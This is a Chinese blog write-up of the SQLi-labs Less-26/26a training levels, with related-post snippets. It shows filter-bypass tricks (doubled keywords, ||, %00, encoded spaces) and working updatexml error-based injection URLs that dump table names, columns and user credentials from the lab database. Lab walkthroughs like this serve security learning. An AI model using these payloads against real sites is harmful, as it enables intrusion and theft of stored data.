SQLI-labs-第二十六关和第二十六a关

于 2024-05-28 15:17:55 发布
阅读量754 收藏 28
点赞数 22
分类专栏: 渗透学习之路 文章标签: 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54055099/article/details/139262053
版权

目录

第二十六关

1、判断注入点

2、判断数据库

3、判断表名

4、判断字段名

5、获取数据库的数据

第二十六a关

第二十六关

知识点:绕过and、or、空格、注释符等过滤

思路

通过源代码,我们可以知道,数据库对用户的输入进行了过滤,对注释符、and、or、空格等都进行了过滤,我们的思路就是要绕过这些过滤。

1、判断注入点

首先,我们输入正常的输入,看看回显

http://127.0.0.1:3306/Less-26/?id=1

接着在后面加入单引号

http://127.0.0.1:3306/Less-26/?id=1'

数据库语句报错,加入注释符,因为注释符被过滤了,所以我们必须进行绕过,关于注释符的绕过可以参考一下23关

SQLI-labs-第二十三关-CSDN博客

这里使用另一种绕过方式,编码,注释符(--)可以使用;%00代替

http://127.0.0.1:3306/Less-26/?id=1';%00

说明当前存在单引号的闭合问题

http://127.0.0.1:3306/Less-26/?id=1' and 1=1 ;%00

这里说明and 空格都被过滤了

and的绕过可以用双写绕过 anandd,也可以用&&代替

or的绕过可以用双写绕过 or,也可以用||代替

空格的过滤绕过可以用下面的这些绕过

%09 TAB键(水平)

%0a 新建一行

%0c 新的一页

%0d return功能

%0b TAB键(垂直)

%a0 空格

上面这些我都使用不了,因为Windows的apache解析问题,所以只能使用()和报错函数进行绕过

2、判断数据库

使用updatexml()函数

http://127.0.0.1:3306/Less-26/?id=1' ||updatexml(1,concat(0x7e,database()),1);%00

使用这种方式的好处就是不用空格,注意这里使用的 || or

3、判断表名

http://127.0.0.1:3306/Less-26/?id=1' ||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),1);%00

使用group_concat()函数可以将数据集合成一行显示出来

4、判断字段名

http://127.0.0.1:3306/Less-26/?id=1' ||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security')anandd(table_name='users'))),1);%00

5、获取数据库的数据

http://127.0.0.1:3306/Less-26/?id=-1' || updatexml(1,concat(1,(select(group_concat(concat_ws(',',id,username,passwoorrd)))from(security.users)where(id=1))),1);%00

通过修改id的值就可以获取所有的信息

第二十六a关

知识点:绕过and、or、空格、注释符等过滤

思路:

这一关的思路也是跟上面的一样,只不过是')的闭合方式,且没有报错信息提示,所以我们不能使用报错函数来注入,只能使用联合查询,关于空格的绕过,可以参考上面的绕过方式

因为本机是Windows环境,所以这一关不做演示

这篇文章就先写到这里,哪里不懂或者不足的欢迎批评指出

賺钱娶甜甜
关注
  • 22
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs26-32
willow_liang的博客
11-06 524
Less-26 代码分析 空格的绕过方法: +也可以代替空格 以下这些在windows+apache环境下解析会出问题??? %09 TAB 键(水平) %0a 新建一行 %0c 新的一页 %0d return 功能 %0b TAB 键(垂直) %a0 空格(长payload出问题)原因不知 由于不能使用注释符,可以构造一个’payload’ 1.基于布尔测试漏洞是否存在 2.使用报错注入或者时间盲注 0'+||extractvalue(1,concat(0x5c,version()))
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五,SQLi-LABS Less-25,SQLi-LABS Less 25,SQLiLABS Less25,SQLi Less 25
sqli-labs/Less-26
m0_71299382的博客
11-20 1390
sqli-labs第二十六
sql-labs闯26~31
qq_44663230的博客
09-03 2363
sql-labs闯26-28a 29~31暂时不做
sqli-labs26
qq_53030229的博客
06-01 926
文章目录一、审查源码1、判断注入点和闭合方式2、过滤方式二、SQL注入1、获取数据库 双写绕过:anandd 大小写绕过And ASCII编码绕过 %20、%0a绕过 内联注释:/!**/ 替换:如 and 可替换为 && ,or 可替换为 || 空格的话我们可以 url 绕过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代 一、审查源码 1、判断注入点和闭合方式 由于这个是与数据库交互的语句,通过这个判断
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在安装 sqli-labs 之前,我们需要准备好以下...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
(手工)【sqli-labs26、26a】拼接注入、过滤后注入
07-12 688
【SQL-拼接、过滤后注入】
sqli-labs————Less-26(绕空格、/*、#等)
Fly_鹏程万里
05-16 2298
Less-26从这里的提示,我们可以看出这一过滤了空格。我们可以查看源代码,看看它的过滤机制:function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id); //Strip out A...
Sqlilabs-26
KAKA的博客
07-14 2290
来到了 Sqlilabs 大魔王的第 26 卡… 来到页面就看到大大的,“你的所有空格和过滤符都属于我们“,这难得到机智的你吗? 在此说下常见的绕过方法有:(本来这应该在 25 卡就说的,忘了…) 双写绕过 大小写绕过 编码绕过,如:hex || URL 注释符绕过,如:/!select/ 替换:如 and 可替换为 && ,or 可替换为 || 空格的话我们可以 url 绕过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代 有了上述的神兵利器,那就很
sqli-labs Less-26、26a、27、27a、28、28a(sqli-labs闯指南 26、26a、27、27a、28、28a)—Advanced injection
m0_54899775的博客
12-25 1299
sqli-labs Less-26、26a、27、27a、28、28a(sqli-labs闯指南 26、26a、27、27a、28、28a)—Advanced injection
sqli-labs第21-28
永远相信美好的事情即将发生
02-11 1110
Less-21 先登进去看看,用户名admin,密码admin 根据前面的经验,我们尝试抓包看看 注意到有个cookie,并且经过了base64编码,于是猜测可能是cookie注入,但要base64编码,构造admin'(YWRtaW4n) 可以看到报错了,报错信息为:'admin'') LIMIT 0,1,其中有一个单引号是我们输入的,所以可以看出闭合方式为单引号加括号,构造admin')#(YWRtaW4nKSM=) 可以看到恢复正常了,接下来就可以尝试联合查询了,只不过构造的语句要base64
sqli-less-26-less26a
沐目的博客
04-18 1027
less-26 单引号 GET型 这就有点过滤的意思了,过滤了上一的东西,并且把空格和%23给过滤了。如果是ubuntu的话,可以用/**/,%0a等绕过,方便一些。但我的是windows,所以就只能用()了。让后使用||来代替and,用‘1来闭合。 数据库: -1’ || updatexml(1,concat(0x7e,(database()),0x7e),1)||'1 表: 1’|...
sqli-labs(26)
weixin_30552635的博客
05-28 522
0X01 测试闭合 单引号报错 双引号不报错 ’闭合 构造语句 过滤了空格和and ?id=1' anandd 1=1%23 ?id=1'+anandd+1=1%23 百度一下 一去看源码 真的顶不住 那我们就别光想着正确的地方输入了 我们用报错注入 ?id=1'||updatexml(1,concat(':',(select database...
sqli-labs闯
10-09
很高兴为您解答于sqli-labs闯的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯,您可以按照以下步骤进行: 1. 下载sqli-labs:您可以在GitHub上找到sqli-labs的源代码并下载到本地环境。 2. 配置环境:根据sqli-labs的README文件,您需要配置适当的web服务器环境(例如Apache、PHP等)以及数据库(例如MySQL)。 3. 导入数据库:使用提供的SQL脚本文件,导入sqli-labs所需的数据库结构和数据。 4. 开始闯:访问您的本地服务器,并根据提示依次完成每个卡。每个卡都会提供一个具有潜在SQL注入漏洞的页面,您需要利用这些漏洞来获取敏感信息或执行其他恶意操作。 5. 学习和实践:在完成每个卡后,阅读解释和提示,深入了解所使用的攻击技术和漏洞原理。尝试自己设计和实现一些新的攻击方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值